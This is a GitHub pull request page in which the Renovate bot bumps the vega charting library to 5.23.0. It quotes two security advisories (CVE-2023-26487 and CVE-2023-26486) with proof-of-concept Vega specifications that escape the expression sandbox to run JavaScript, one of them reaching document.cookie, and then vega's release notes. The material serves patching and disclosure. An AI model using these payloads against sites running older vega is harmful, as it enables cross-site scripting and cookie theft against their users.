search

stencila / designa

📐 Stencila's design system
https://stencila.github.io/designa
Apache License 2.0
11 stars 1 forks source link

fix(dependencies): update dependency vega to v5.23.0 [security] #360

Closed renovate[bot] closed 10 months ago

renovate[bot] commented 1 year ago

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vega 5.22.0 -> 5.23.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2023-26487

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes push function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument, push function can be set to any function that can be access via event.view (no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceed minDist or its the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....

PoC

Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate function, feel free to replace with event.view.console.log or alike and observe the result in the browser's console)

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#​006BB4' : '#​939597'"}
        }
      }
    }
  ]
}

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

CVE-2023-26486

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.

PoC

The following Vega definition can be used to demonstrate this issue executing the JavaScript code alert(1);

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA

Release Notes

vega/vega (vega) ### [`v5.23.0`](https://togithub.com/vega/vega/releases/tag/v5.23.0) [Compare Source](https://togithub.com/vega/vega/compare/v5.22.1...v5.23.0) Changes from [v5.22.1](https://togithub.com/vega/vega/releases/tag/v5.22.1): This version contains dependency updates, bug fixes, and security patches, plus a few extra utilities to aid Vega-Lite. **monorepo** - Update dependencies, including D3 packages. - Update rollup config to use `.mjs` extensions. **vega-canvas** - Update rollup config. **vega-crossfilter** - Update rollup config. **vega-dataflow** - Update rollup config. **vega-encode** - Update rollup config. **vega-event-selector** - Update rollup config. **vega-expression** - Update rollup config. **vega-force** - Update rollup config. **vega-format** - Update rollup config. **vega-functions** - Fix `lassoAppend` expression function XSS. (**Thanks [@​arvind](https://togithub.com/arvind)!**) - Fix `scale` expression function XSS (**Thanks [@​ajxchapman](https://togithub.com/ajxchapman) and [@​hydrosquall](https://togithub.com/hydrosquall)!**) - Update rollup config. **vega-geo** - Update rollup config. **vega-hierarchy** - Update rollup config. **vega-interpreter** - Update rollup config. **vega-label** - Prevent evaluation of unsafe methods, [#​3570](https://togithub.com/vega/vega/issues/3570) (**Thanks [@​AMoo-Miki](https://togithub.com/AMoo-Miki)!**) - Update rollup config. **vega-loader** - Update rollup config. **vega-parser** - Add `view` style for Vega-Lite, [#​3480](https://togithub.com/vega/vega/issues/3480) (**Thanks [@​arvind](https://togithub.com/arvind)!**) - Update rollup config. **vega-projection** - Register projections as recognized Vega scales. - Update rollup config. **vega-projection-extended** - Update rollup config. **vega-regression** - Update rollup config. **vega-runtime** - Update rollup config. **vega-scale** - Add `registerScale()` and `isRegisteredScale()` methods. (**Thanks [@​hydrosquall](https://togithub.com/hydrosquall)!**) - Register scales as recognized Vega scales. - Update rollup config. **vega-scenegraph** - Update test cases to match dependency updates. - Update rollup config. **vega-schema** - Make `__count__` private from schema, [#​3659](https://togithub.com/vega/vega/issues/3659) (**Thanks [@​lsh](https://togithub.com/lsh)!**) - Update rollup config. **vega-selections** - Update rollup config. **vega-statistics** - Update rollup config. **vega-time** - Update rollup config. **vega-transforms** - Update rollup config. **vega-typings** - Make `__count__` private from schema, [#​3659](https://togithub.com/vega/vega/issues/3659) (**Thanks [@​lsh](https://togithub.com/lsh)!**) - Update scenegraph item typings (**Thanks [@​jonathanzong](https://togithub.com/jonathanzong)!**) - Update rollup config. **vega-util** - Update typescript config. - Update rollup config. **vega-view** - Wrap querySelectorAll in Array.from, [#​3639](https://togithub.com/vega/vega/issues/3639) (**Thanks [@​ravron](https://togithub.com/ravron)!**) - Update rollup config. **vega-view-transforms** - Update rollup config. - Fix autosize="fit-x/y" when legend is larger than plot, [#​3474](https://togithub.com/vega/vega/issues/3474) (**Thanks [@​stas-sl](https://togithub.com/stas-sl)!**) **vega-voronoi** - Update rollup config. **vega-wordcloud** - Update rollup config. **vega-cli** - Update rimraf version, adjust code in response. - Update rollup config. **vega** - Update test scenes to match dependency updates. - Update rollup config. ### [`v5.22.1`](https://togithub.com/vega/vega/releases/tag/v5.22.1) [Compare Source](https://togithub.com/vega/vega/compare/v5.22.0...v5.22.1) Changes from [v5.22.0](https://togithub.com/vega/vega/releases/tag/v5.22.0): **monorepo** - Update dependencies. **vega-scenegraph** - Fix SVG path parser null check. ([#​3451](https://togithub.com/vega/vega/issues/3451)).

Configuration

📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR has been generated by Mend Renovate. View repository job log here.